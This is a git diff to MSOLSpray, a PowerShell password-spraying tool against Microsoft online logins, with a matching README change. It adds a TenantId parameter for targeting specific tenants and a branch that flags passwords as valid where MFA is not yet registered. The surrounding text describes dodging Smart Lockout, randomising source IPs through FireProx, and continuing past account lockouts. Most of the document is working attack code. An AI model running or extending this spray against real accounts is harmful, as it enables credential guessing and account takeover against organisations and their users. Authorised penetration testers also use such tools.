diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 439d9d8..0483431 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -34,6 +34,10 @@ function Invoke-MSOLSpray{ The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. + .PARAMETER TenantId + + The tenant ID to target. Default is "common". Useful for forcing authentication against a specific tenant (e.g., for B2B users). + .PARAMETER Delay Delay in seconds between each authentication attempt. Helps avoid rate limiting and Smart Lockout. Default is 0 seconds. @@ -84,14 +88,18 @@ function Invoke-MSOLSpray{ $URL = "https://login.microsoft.com", [Parameter(Position = 4, Mandatory = $False)] + [string] + $TenantId = "common", + + [Parameter(Position = 5, Mandatory = $False)] [switch] $Force, - [Parameter(Position = 5, Mandatory = $False)] + [Parameter(Position = 6, Mandatory = $False)] [int] $Delay = 0, - [Parameter(Position = 6, Mandatory = $False)] + [Parameter(Position = 7, Mandatory = $False)] [switch] $VerboseErrors ) @@ -146,7 +154,7 @@ function Invoke-MSOLSpray{ # Setting up the web request $BodyParams = @{'resource' = 'https://graph.windows.net'; 'client_id' = '1b730954-1685-4b74-9bfd-dac224a7b894' ; 'client_info' = '1' ; 'grant_type' = 'password' ; 'username' = $username ; 'password' = $password ; 'scope' = 'openid'} $PostHeaders = @{'Accept' = 'application/json'; 'Content-Type' = 'application/x-www-form-urlencoded'} - $webrequest = Invoke-WebRequest $URL/common/oauth2/token -Method Post -Headers $PostHeaders -Body $BodyParams -ErrorVariable RespErr + $webrequest = Invoke-WebRequest $URL/$TenantId/oauth2/token -Method Post -Headers $PostHeaders -Body $BodyParams -ErrorVariable RespErr # If we get a 200 response code it's a valid cred If ($webrequest.StatusCode -eq "200"){ @@ -178,11 +186,18 @@ function Invoke-MSOLSpray{ } # Microsoft MFA response - ElseIf(($RespErr -match "AADSTS50079") -or ($RespErr -match "AADSTS50076")) + ElseIf($RespErr -match "AADSTS50076") { Write-Host -ForegroundColor "green" "[*] SUCCESS! $username : $password - NOTE: The response indicates MFA (Microsoft) is in use." $fullresults += "$username : $password" } + + # User can complete MFA registration + ElseIf($RespErr -match "AADSTS50079") + { + Write-Host -ForegroundColor "green" "[*] SUCCESS! $username : $password - NOTE: The response indicates that MFA can be onboarded (password is valid)." + $fullresults += "$username : $password" + } # Conditional Access response (Based off of limited testing this seems to be the repsonse to DUO MFA) ElseIf($RespErr -match "AADSTS50158") @@ -313,4 +328,5 @@ function Invoke-MSOLSpray{ Write-Output "Results have been written to $OutFile." } } + Write-Host "" } diff --git a/README.md b/README.md index 33f210f..61c404c 100644 --- a/README.md +++ b/README.md @@ -29,6 +29,7 @@ Password - A single password that will be used to perform the password spray. OutFile - A file to output valid results to. Force - Forces the spray to continue and not stop when multiple account lockouts are detected. URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +TenantId - The tenant ID to target. Default is "common". Useful for forcing authentication against a specific tenant (e.g., for B2B users). Delay - Delay in seconds between each authentication attempt. Helps avoid rate limiting and Smart Lockout. Default is 0 seconds. VerboseErrors - Displays additional error information for troubleshooting authentication issues. ```